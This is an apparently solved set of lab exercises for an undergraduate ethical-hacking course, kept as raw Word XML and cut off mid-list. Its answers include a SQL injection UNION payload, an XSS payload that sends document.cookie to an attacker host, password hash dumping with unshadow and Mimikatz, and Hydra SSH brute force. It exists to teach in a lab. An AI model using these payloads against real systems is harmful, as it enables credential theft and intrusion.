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Ethical Hacking Practical (CDS-203-MJP) – Solved Slips</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Course:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> S.Y. B.Sc. (Cyber and Digital Science) – Sem III, Lab on CDS-201-MJ Ethical Hacking-I Slips 4, 6, 8, 9, 17, 21 have been excluded as requested. All work below assumes an isolated, legally authorized lab environment (your own VMs — Kali Linux, DVWA, Metasploitable2, a test Windows VM).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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Install and configure Kali Linux in VirtualBox, verify network connectivity (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Download the official Kali VirtualBox image (.ova) from kali.org.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In VirtualBox: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">File → Import Appliance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → select the .ova file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Allocate resources (≥2 GB RAM, 2 CPU cores) and set the Network Adapter to NAT or Bridged.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Start the VM and log in (default creds vary by image; set your own on first boot).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify connectivity:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ip a</w:t>
        <w:br/>
        <w:t xml:space="preserve">ping -c 4 8.8.8.8</w:t>
        <w:br/>
        <w:t xml:space="preserve">ping -c 4 google.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">Successful replies confirm both network-layer and DNS connectivity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Perform a WHOIS lookup for a given domain and extract registrar details (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">whois example.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">From the output, extract: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Registrar name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (e.g., GoDaddy, Namecheap)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Creation / Updated / Expiry dates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Name servers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Registrant organization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (often redacted by privacy protection)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2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Perform TCP, UDP, SYN, and FIN scans on a target using Nmap (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nmap -sT &lt;target&gt;      # Full TCP connect scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">nmap -sU &lt;target&gt;      # UDP scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">nmap -sS &lt;target&gt;      # SYN (stealth/half-open) scan</w:t>
        <w:br/>
        <w:t xml:space="preserve">nmap -sF &lt;target&gt;      # FIN scan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-sT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> completes the full 3-way handshake (reliable, more detectable).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-sS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sends SYN only, never completes handshake (faster, stealthier, needs root).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-sU</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> probes UDP ports (slower; relies on ICMP unreachable for closed-port detection).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-sF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sends a FIN flag; open ports usually don't respond, closed ports send RST — useful for evading simple stateful filters.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Perform vulnerability scanning using Nessus (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Install Nessus and start the service: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl start nessusd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Browse to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">https://localhost:8834</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and activate with an Essentials key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">New Scan → Basic Network Scan</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, enter the target IP/range.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Launch the scan and wait for completion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Review the report: vulnerabilities are graded Critical/High/Medium/Low/Info with CVE references and remediation advice.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3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Perform SQL Injection in DVWA to extract user credentials (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log into DVWA, set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA Security → Low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 the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">1' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to confirm injectability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumerate columns, then extract data with a UNION query, e.g.:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1' UNION SELECT user, password FROM users -- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The page returns usernames and password hashes; crack them with John/Hashcat if needed (see Slip 5/15).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Configure Windows 10 as a target machine in the penetration testing lab (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create a Windows 10 VM (VirtualBox/VMware) and attach it to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">same internal/host-only network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as Kali.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For lab purposes, disable Windows Defender Firewall (Control Panel → Windows Defender Firewall → turn off) and enable File and Printer Sharing so it responds to scans.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note the Windows VM's IP (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ipconfig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From Kali, verify reachability: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping &lt;windows-ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV &lt;windows-ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">(The marginal note on this slip suggests the examiner substituted enum4linux — see Slip 4-style answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">enum4linux -a &lt;target-ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> enumerates SMB shares, users, and groups on a Linux/Samba target.)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5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Crack Linux password hashes using John the Ripper (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">On the target (with appropriate access), combine the shadow and passwd files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">unshadow /etc/passwd /etc/shadow &gt; hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run John:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">john hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">View cracked passwords:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">john --show hashes.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Exploit Reflected XSS in DVWA to capture a session cookie (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set security to Low, open the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">XSS (Reflected)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirm the vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;script&gt;alert('Hello')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To actually exfiltrate a cookie to an attacker-controlled listener:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">&lt;script&gt;document.location='http://&lt;attacker-ip&gt;/steal.php?c='+document.cookie&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Host a simple listener (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvp 80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or a small PHP logger) on the attacker machine to capture the incoming cookie value.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7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Capture and analyze network packets using Wireshark (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open Wireshark, select the active interface, click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Start Capture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Generate some traffic (ping, browse a site, DVWA login).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply display filters, e.g.:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">http</w:t>
        <w:br/>
        <w:t xml:space="preserve">dns</w:t>
        <w:br/>
        <w:t xml:space="preserve">ip.addr == 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Right-click a packet → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Follow → TCP Stream</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to reconstruct a conversation (e.g., to see cleartext HTTP credentials).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Extract Windows credentials using Mimikatz (15M)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">(On an already-compromised/own lab Windows VM, with admin rights, strictly for the lab.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run Mimikatz as Administrator.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privilege::debug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sekurlsa::logonpasswords</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — dumps cached logon credentials/NTLM hashes from LSASS memory. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">(The marginal annotation references CSRF instead — see Slip 10, Q2, for the CSRF-in-DVWA procedure.)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10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Perform brute-force SSH login using Hydra (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">hydra -l &lt;username&gt; -P /usr/share/wordlists/rockyou.txt ssh://&lt;target-ip&gt;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-l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> specifies a single known username (use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for a username list).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-P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> specifies the password wordlist. Hydra reports any valid username/password pair it finds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Perform a CSRF attack in DVWA to change a user's password (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set security to Low; the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> module's password-change form has no anti-CSRF token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Note the GET/POST parameters used by the legitimate change-password request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Craft a malicious HTML page that auto-submits a forged request with the attacker's chosen password, e.g. an auto-submitting form or an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/hidden-form pointing at the vulnerable endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If a logged-in victim (with an active DVWA session) visits that page, their password is changed without their knowledge — demonstrating the missing CSRF protection.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11</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Set up a penetration testing lab with Metasploitable2 and Kali Linux (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Import the Metasploitable2 VM into VirtualBox/VMware.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Attach both Kali and Metasploitable2 to the same </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Host-only</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Internal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> network (never Bridged/NAT to the internet — Metasploitable2 is intentionally insecure).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Boot Metasploitable2 (default creds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfadmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">msfadmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), note its IP (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From Kali: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping &lt;metasploitable2-ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV &lt;metasploitable2-ip&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to confirm connectivity and enumerate services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Use Google Dorking to find hidden files or directories (15M)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Example dork operators:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">site:example.com filetype:pdf</w:t>
        <w:br/>
        <w:t xml:space="preserve">intitle:"index of" "parent directory"</w:t>
        <w:br/>
        <w:t xml:space="preserve">inurl:admin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site:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> restricts to a domain, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">filetype:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> restricts to a file extension, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">intitle:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> matches page titles, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">inurl:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> matches URL text. Combined, these surface exposed directory listings, backup files, or admin panels indexed by Google.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12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q1. Enumerate SNMP information using Nmap/snmpwalk (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">nmap -sU -p 161 &lt;target&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">snmpwalk -v1 -c public &lt;target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">The walk reveals system description, uptime, running processes, interfaces, and installed software if the community string (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) is correct and SNMP is misconfigured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Q2. Exploit weak Linux file permissions for privilege escalation (15M)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hunt for escalation vectors:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">find / -perm -u=s -type f 2&gt;/dev/null      # SUID binaries</w:t>
        <w:br/>
        <w:t xml:space="preserve">find / -writable -type f 2&gt;/dev/null | grep -v proc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If a world-writable sensitive file is found (e.g., a cron script run as root, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> writable), modify it to add a backdoor root user or execute a payload as root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
